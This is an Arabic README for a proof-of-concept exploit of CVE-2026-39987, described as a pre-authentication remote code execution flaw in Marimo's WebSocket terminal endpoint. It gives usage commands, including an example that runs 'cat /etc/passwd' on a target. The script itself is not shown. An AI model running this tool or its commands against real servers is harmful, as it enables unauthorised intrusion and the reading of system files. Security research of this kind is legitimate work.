
إثبات مفهوم بسيط لـ CVE-2026-39987
يحتوي هذا المستودع على سكربت إثبات المفهوم (POC) لثغرة CVE-2026-39987، وهي ثغرة تنفيذ كود عن بُعد (RCE) قبل المصادقة في Marimo. يستغل السكربت نقطة نهاية WebSocket لتنفيذ أوامر عشوائية على النظام المستهدف.
/terminal/ws)pip install websocket-client
python exploit.py -u <TARGET_URL> [-c ""]
python exploit.py -u http://example.com:2718 -c "cat /etc/passwd"
-u, --url: عنوان URL المستهدف (مثال: http://localhost:2718)
-c --command: الأمر المراد تنفيذه (الافتراضي هو id && whoami && hostname)
-h, --help
هذا السكربت مخصص لأغراض تعليمية وبحثية فقط.
استخدمه بمسؤولية وفقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
قد يؤدي إساءة استخدام هذه الأداة إلى عواقب غير مقصودة ومخاطر أمنية محتملة.
باستخدامك لهذا السكربت، فإنك تقر بأنك المسؤول الوحيد عن أي إجراءات يتم اتخاذها.